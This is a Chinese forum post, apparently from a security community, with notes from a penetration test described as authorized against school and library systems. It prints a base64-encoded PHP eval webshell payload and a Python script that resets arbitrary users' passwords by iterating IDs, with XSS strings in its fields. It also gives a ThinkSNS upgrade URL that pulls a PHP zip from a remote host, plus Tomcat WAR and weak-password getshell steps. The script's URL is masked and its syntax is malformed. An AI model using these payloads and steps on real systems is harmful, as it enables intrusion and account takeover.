首页
社区
课程
招聘
[原创]某次授权渗透测试小记
发表于: 2021-7-20 21:48 2318

[原创]某次授权渗透测试小记

2021-7-20 21:48
2318

目录

一、某次授权渗透测试部分小记

本文已得到授权
如发现存在问题发送邮件到:UzJuer@163.com删除文章

1、帝国CMS 后台GETSHELL

图书馆的一个系统,为开源CMS修改的,然后通过版本探测与其他的信息收集,发现那个版本好像有一个getshell,不过是后台的,尝试一下,账号admin密码123456发现对了之后GetShell了

1
2
<script language="php">echobase64_decode("PD9waHAgQGV2YWwoJF9QT1NUWydjb WQnXSk7Pz4=");</script>
//这个是当时的payload

image-20210415200000737

 

image-20210415200305014

点击提交后访问http://xxxxx:port/e/admin/R3inSecurity_Team.php

然后使用菜刀连接就可以了

 

image-20210415200511803

不过需要注意的是,这里执行cmd命令会发现其实不是administrator,需要提权,因为当时除了这里其他地方已经获取到了administrator权限, 所以这个shell就没有提权

 

image-20210415200539992


2、某营销系统综合实训室逻辑漏洞

以下是我当时挖到漏洞后写的Poc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
1.# __author__ 'R3inS3curity.UzJu'
2.# Creat time 2020/7/17 20:14 
3.import requests 
4.import re 
5.from bs4 import BeautifulSoup 
6. 
7.def Hacked_Testing(): 
8.    for a in range(1,100): 
9.        r = 'http://xxx:port/updaXte.dXo?methXod=saXve' 
10.        cookie1s = {'JSESSIONID':'DCBDA30F80F1DEA2X1123C8080FBE'
11.                   'submenuheader':'-1c'
12.        datas =
13.            'id':a, 
14.            'password':'123456789'
15.            'repassword':'123456789'
16.            'stuNo':'200107'
17.            'realName':'%E4%B1231%A3'
18.            'sex':'1'
19.            'schollTime': '2019-03-08'
20.            'tel': '%3Cscr23rt123t%3E'
21.            'address': '%3Cscript%3E1alert%281%23script%3E'
22.            'birthPlace': '%3Cscrip123Fscript%3E'
23.            'idNumber': '%3Cscript%3Eale123C%2Fscript%3E'
24.            'head_img': '%2Fuploadfiles1%123lt_head.gif'
25.            'x=': '50'
26.            'y': '6' 
27.       
28.        result = requests.post(url=r, cookies=cookie1s, data=datas) 
29.        soup = BeautifulSoup(result.text, features="html.parser"
30.        print('[+]Current ID is:{},UserName is:{}'.format(a, soup.td.text)) 
31.Hacked_Testing()

当时的漏洞截图

 

 

 

这个ID就是用户的ID,修改这个就可以重置任何用户的密码^ ^ 然后写脚本跑

 

 

尝试将修改的密码,进行登录,可以登录成功。

 

 

3、C-xxxx打印服务系统未授权访问

只要一直点直接打印,打印机就会一直出纸,也可以DIY打印内容,只需要替换框中的内容即可,后来沟通中反馈说打印机除了非常多的纸,部分员工还以为打印机坏了

 

4、tomcat弱口令GETSHELL

这个漏洞主要就是tomcat-user.xml的配置问题导致的,然后进到manger后上传shell的war包就可以了

 

这个账号admin 密码为空,然后上传war包就可以getshell了

 

 

 


 

 

 

 

 

 

打包好之后上传就可以啦

 

5、某卓越营销实践系统SQL注入getshell

这个漏洞没啥好说的,上去sqlmap一把嗦就完事了(其实这里还有一个存储型XSS)

 

 

image-20210718145257065

 

image-20210718145317033

 

image-20210718145329516

 

image-20210718145343862

 

 

 

然后远程链接服务器就可以了

 

这个服务器改端口了,本来是3389远程连接的,改成了3300,接下来就简单说一下,怎么找到3300这个端口的

Cmd输入tasklist /svc然后找到TermService找到PID2416

 

然后使用netstat -aon|findstr “2416”找到对应的PID就能找到远程端口

 


6、ThinkSNS管理员弱口令后台GetShell

弱口令登录,后台getshell

 

 

漏洞复现地址:http://xxx:port/index.php?app=admin&mod=Upgrade&act=step1&upurl=http://xxx:port/test/UzJu.zip

 

由于配置问题,访问/data/upgrade就可以看到目录下的文件,data目录也是如此

 

 

将数据包的act改成setp2和upurl改成filename=UzJu.zip

 

 

然后去访问这个Php

 

 

image-20210415212408508

然后正常获取权限就行,以下是漏洞代码的位置

漏洞代码发生在路径/apps/admin/lib/Action/UpgradeAction.class.php文件。

 

46行处,升级时调用check函数升级通过C('UPURL').'?v='.C('VERSION')获取升级链接

 

在169行,直接再次调用且upurl可控,覆盖之前的&upurl远程升级下载包含.php的UzJu.zip压缩包先下载再校验,存在逻辑问题,直接构造url payload下载。此为漏洞的引发起始点,再往下看在226行处step2,Step2解压也存在问题未进行校验文件就进行解压到网站根目录

 

image-20210416080517746

7、文件共享信息泄露

全是DB与数据

 

 

8、某卓越市场营销模拟平台垂直越权

image-20210718145726756

 

image-20210718145743149

 

image-20210718145754645

登录不同的账号,就会有不同的路径,然后尝试改一改路径,发现可以越权,:)

 

image-20210718145804002

 

image-20210718145828329

两张图不难发现,我通过修改不同的路径,然后越权到了不同的权限,学生--->老师

 

image-20210718145857505


 

内网信息收集,随便放几张图吧,太敏感了

 

image-20210718150127775

 

弱口令,永远的神!


[培训]《安卓高级研修班(网课)》月薪三万计划,掌握调试、分析还原ollvm、vmp的方法,定制art虚拟机自动化脱壳的方法

最后于 2021-7-21 09:31 被UzJu编辑 ,原因: update
收藏
免费 0
支持
分享
最新回复 (3)
雪    币: 589
活跃值: (200)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
2
学到了,弱口令,永远的神!
2021-7-30 09:10
0
雪    币: 7
活跃值: (54)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
3
大佬 66666
2021-8-1 17:06
0
雪    币: 6
活跃值: (55)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
有联系方式嘛?有点地方需要请教
2021-8-1 21:29
0
游客
登录 | 注册 方可回帖
返回
//